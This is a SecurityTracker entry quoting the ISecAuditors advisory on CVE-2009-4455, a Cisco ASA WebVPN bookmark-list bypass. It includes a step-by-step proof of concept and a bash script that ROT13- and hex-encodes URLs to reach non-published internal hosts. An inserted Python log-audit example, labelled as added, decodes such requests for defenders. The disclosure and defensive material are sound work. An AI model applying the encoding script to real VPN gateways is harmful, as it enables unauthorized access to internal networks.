SecurityTracker.com
Category:   Device (Firewall)  >   Cisco ASA
Vendors:   Cisco
Cisco ASA WebVPN Bookmark List Can Be Bypassed By Remote Authenticated Users
SecurityTracker Alert ID:  1023368
SecurityTracker URL:  http://securitytracker.com/id/1023368
CVE Reference:   CVE-2009-4455
Updated:  Dec 31 2009
Original Entry Date:  Dec 17 2009
Impact:   Host/resource access via network
Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 8.x and prior versions
Description:   David Eduardo Acosta Rodriguez of ISecAuditors reported a vulnerability in Cisco ASA. A remote authenticated user can bypass the WebVPN bookmark list to access ostensibly protected resources on the internal network.

A remote authenticated Clientless SSL VPN user can send a specially crafted URL to access internal network resources that are not listed on the WebVPN home page.

Cisco has assigned Bug ID CSCtd73211 to this vulnerability.

The vendor was notified on December 9, 2009.

[Editor's note: The vendor does not consider the WebVPN bookmark feature to be an access control feature.]

Impact:   A remote authenticated user can access ostensibly protected resources on the internal network.
Solution:   No solution was available at the time of this entry.

The vendor's advisory is available at:

http://tools.cisco.com/security/center/viewAlert.x?alertId=19609

Vendor URL:  www.cisco.com/
Cause:   Access control error
Underlying OS:  

Message History:   None.


 Source Message Contents

Date:  Thu, 17 Dec 2009 13:48:41 +0100
Subject:  [ISecAuditors Security Advisories] Cisco ASA <= 8.x VPN SSL module Clientless URL-list control bypass

=============================================
INTERNET SECURITY AUDITORS ALERT 2009-013
- Original release date: December 7th, 2009
- Last revised: December 16th, 2009
- Discovered by: David Eduardo Acosta Rodriguez
- Severity: 4/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
Cisco ASA <= 8.x VPN SSL module Clientless URL-list control bypass

II. BACKGROUND
-------------------------
Cisco VPN SSL [1] is a module for Cisco ASA and Cisco Integrated
Services Routers to extend network resources to virtually any remote
user with access to the Internet and a web browser.

III. DESCRIPTION
-------------------------
Cisco VPN SSL Clientless lets administrators define rules for specific
targets within the private network that WebVPN users will be able to
access. These specific targets are published as links on the VPN SSL
home page. These links (URLs) are protected (obfuscated) using a ROT13
substitution [2] and conversion of the ASCII characters to hexadecimal.
A user with a valid account and without "URL entry" can access any
internal/external resource simply by taking a URL, encoding it with
ROT13, converting the ASCII characters to hexadecimal and appending
this string to the Cisco VPN SSL URL.

IV. PROOF OF CONCEPT
-------------------------
Using the URL http://intranet, published on an internal server (not
accessible from the home page):
1. Convert string to ROT13: uggc://vagenarg
2. Change ASCII chars to HEX: 756767633a2f2f766167656e617267
3. Append string to Cisco VPN SSL:
https://[CISCOVPNSSL]/+CSCO+00756767633a2f2f766167656e617267++

This is a simple PoC for easy demonstration:

#!/bin/bash
# Encode a URL the way the Clientless SSL VPN expects it: ROT13 the
# letters, then hex-encode the ASCII bytes, then wrap in +CSCO+00...++
echo -n "write URL:"
read -r a
b=$(echo -n "$a" | tr 'A-Za-z' 'N-ZA-Mn-za-m' | od -An -tx1 | tr -d ' \n')
echo "URL https://[CISCOVPNSSL]/+CSCO+00${b}++"
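The encoding described in section III and exercised by the PoC above is trivially reversible, which is what makes it useful on the defender's side: the same transform can be run backwards over a WebVPN access log to recover every target a user actually requested and compare it against the published bookmark list. The following is an added example, not code from the advisory or from Cisco; the log line layout (time, user, method, path) and the allow-list are constructed for illustration.

```python
import codecs
import re
from urllib.parse import urlsplit

# Request path form shown in the advisory: /+CSCO+00<hex of ROT13(url)>++
CSCO_RE = re.compile(r"/\+CSCO\+00([0-9a-fA-F]+)\+\+")


def encode_target(url: str) -> str:
    """ROT13 the URL, then hex-encode its ASCII bytes (the scheme the advisory describes)."""
    return codecs.encode(url, "rot_13").encode("ascii").hex()


def decode_target(hexstr: str) -> str:
    """Inverse transform: hex -> ASCII -> ROT13 (ROT13 is its own inverse)."""
    return codecs.decode(bytes.fromhex(hexstr).decode("ascii"), "rot_13")


def audit_requests(log_lines, allowed_hosts):
    """Return (user, decoded_url) for each request whose host is not a published bookmark."""
    findings = []
    for line in log_lines:
        m = CSCO_RE.search(line)
        if not m:
            continue
        user = line.split()[1]  # constructed layout: <time> <user> <method> <path>
        try:
            target = decode_target(m.group(1))
        except (ValueError, UnicodeDecodeError):
            findings.append((user, "<undecodable: " + m.group(1) + ">"))
            continue
        host = urlsplit(target).hostname or ""
        if host not in allowed_hosts:
            findings.append((user, target))
    return findings


# Constructed sample: the bookmark list publishes only http://portal
ALLOWED_HOSTS = {"portal"}
SAMPLE_LOG = [
    "12:00:01 alice GET /+CSCO+00" + encode_target("http://portal") + "++",
    "12:00:05 bob GET /+CSCO+00756767633a2f2f766167656e617267++",  # http://intranet, from the advisory
    "12:00:09 bob GET /+CSCO+00" + encode_target("http://10.0.0.5/admin") + "++",
]

if __name__ == "__main__":
    for user, target in audit_requests(SAMPLE_LOG, ALLOWED_HOSTS):
        print(f"{user} requested non-bookmarked target {target}")
```

Because the bookmark list is only a presentation layer, a hit here is expected behaviour on an unfiltered box; the real control is the webtype ACL from section VII, and this audit shows which users relied on its absence.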

V. BUSINESS IMPACT
-------------------------
Users with a valid account can browse to internal/external resources,
bypassing the controls on the home page.

VI. SYSTEMS AFFECTED
-------------------------
Cisco ASA <= 8.x are vulnerable.

VII. SOLUTION
-------------------------
Always set a "webtype" ACL and "filter" to block access in Web VPN SSL
(not activated by default). This recommendation is now included on the
Cisco site. Follow the recommendations in "Cisco Understanding Features
Not Supported in Clientless SSL VPN" [3].

VIII. REFERENCES
-------------------------
[1] www.cisco.com/web/go/sslvpn
[2] http://en.wikipedia.org/wiki/ROT13
[3] http://www.cisco.com/en/US/docs/security/asa/asa82/configuration/guide/webvpn.html#wp999589
http://tools.cisco.com/security/center/viewAlert.x?alertId=19609
http://www.isecauditors.com

IX. CREDITS
-------------------------
This vulnerability has been discovered by
David Eduardo Acosta Rodríguez (deacosta (at) isecauditors (dot) com,
                                dacosta (at) computer (dot) org).
Thanks to Juan Galiana Lara (jgaliana (at) isecauditors (dot) com)
for additional research.

X. REVISION HISTORY
-------------------------
December   7, 2009: Initial release.
December  16, 2009: Last revision.

XI. DISCLOSURE TIMELINE
-------------------------
December   9, 2009: Vendor contacted
December   9, 2009: Vendor response, they include our mitigation
                    proposal in their website and start the analysis
                    of correction required.
December  16, 2009: Vendor confirms remediation and public statement.
December  17, 2009: Sent to lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.
Copyright 2014, SecurityGlobal.net LLC